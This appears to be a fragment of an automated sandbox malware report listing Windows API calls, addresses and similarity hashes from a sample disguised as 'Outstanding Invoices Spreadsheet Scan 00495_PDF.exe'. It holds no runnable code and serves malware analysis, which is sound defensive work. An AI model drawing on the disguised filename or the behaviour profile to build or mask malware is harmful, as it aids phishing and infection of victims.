                                                                              • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                              • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                              • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                              • String ID:
                                                                              • API String ID: 2354583917-0
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • GetMenu.USER32 ref: 004776AA
                                                                              • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                              • _wcslen.LIBCMT ref: 0047771A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Menu$CountItemStringWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 1823500076-0
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$MessageMoveSend
                                                                              • String ID:
                                                                              • API String ID: 896007046-0
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                              • SendMessageW.USER32(02FD1B28,000000F1,00000000,00000000), ref: 004414C6
                                                                              • SendMessageW.USER32(02FD1B28,000000F1,00000001,00000000), ref: 004414F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004484C4
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                              • IsMenu.USER32(?), ref: 0044857B
                                                                              • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                              • DrawMenuBar.USER32 ref: 004485E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3866635326-4108050209
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                              • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                              • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                              • String ID: 0vH
                                                                              • API String ID: 327565842-3662162768
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                              • GetFocus.USER32 ref: 00448B1C
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$FocusMessageSend
                                                                              • String ID:
                                                                              • API String ID: 3429747543-0
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                              • __swprintf.LIBCMT ref: 0045D3CC
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu$HH
                                                                              • API String ID: 3164766367-3924996404
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 3850602802-3636473452
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                              • __calloc_crt.LIBCMT ref: 00415743
                                                                              • __getptd.LIBCMT ref: 00415750
                                                                              • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                              • __dosmaperr.LIBCMT ref: 004157A9
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Similarity
                                                                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                              • String ID:
                                                                              APIs
                                                                                • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                              • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                              • ExitThread.KERNEL32 ref: 004156BD
                                                                              • __freefls@4.LIBCMT ref: 004156D9
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                              Similarity
                                                                              • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                              • String ID:
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00433724
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                              • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                              • GetWindowRect.USER32(?,?), ref: 00433814
                                                                              • ScreenToClient.USER32(?,?), ref: 00433842
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                              • String ID:
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                              • String ID:
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                              • SendInput.USER32 ref: 0044C6E2
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$InputSend
                                                                              • String ID:
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _wcscpy$_wcscat
                                                                              • String ID:
                                                                              APIs
                                                                              • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                              • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                              • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                              • EndPaint.USER32(?,?), ref: 00447CD1
                                                                              Similarity
                                                                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                              • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                              • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                              • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                              • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow$InvalidateRect
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00442597
                                                                                • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                              • GetDesktopWindow.USER32 ref: 004425BF
                                                                              • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                              • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              • GetCursorPos.USER32(?), ref: 00442624
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$MessageSend
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044961A
                                                                              • SendMessageW.USER32 ref: 0044964A
                                                                                • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                              • _wcslen.LIBCMT ref: 004496BA
                                                                              • _wcslen.LIBCMT ref: 004496C7
                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Similarity
                                                                              • API ID: DestroyWindow$DeleteObject$IconMove
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 752480666-0
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                              • String ID:
                                                                              • API String ID: 3275902921-0
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                              • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                              • __calloc_crt.LIBCMT ref: 0041419B
                                                                              • __getptd.LIBCMT ref: 004141A8
                                                                              • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                              • __dosmaperr.LIBCMT ref: 00414201
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Similarity
                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1803633139-0
                                                                              APIs
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                              • String ID:
                                                                              • API String ID: 3275902921-0
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 004554DF
                                                                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Similarity
                                                                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 3691411573-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                              • String ID:
                                                                              • API String ID: 1814673581-0
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                              • LineTo.GDI32(?,?,?), ref: 00447227
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                              • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                              • EndPath.GDI32(?), ref: 0044724E
                                                                              • StrokePath.GDI32(?), ref: 0044725C
                                                                              Similarity
                                                                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                              • String ID:
                                                                              • API String ID: 372113273-0
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0044CBEF
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                              • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                              • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                              • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000004), ref: 00436055
                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                              • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                              • GetLastError.KERNEL32 ref: 00436081
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                              Similarity
                                                                              • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                              • String ID:
                                                                              • API String ID: 1690418490-0
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                              • CoUninitialize.OLE32 ref: 00475D71
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk$HH
                                                                              • API String ID: 886957087-3121654589
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 763830540-1403004172
                                                                              APIs
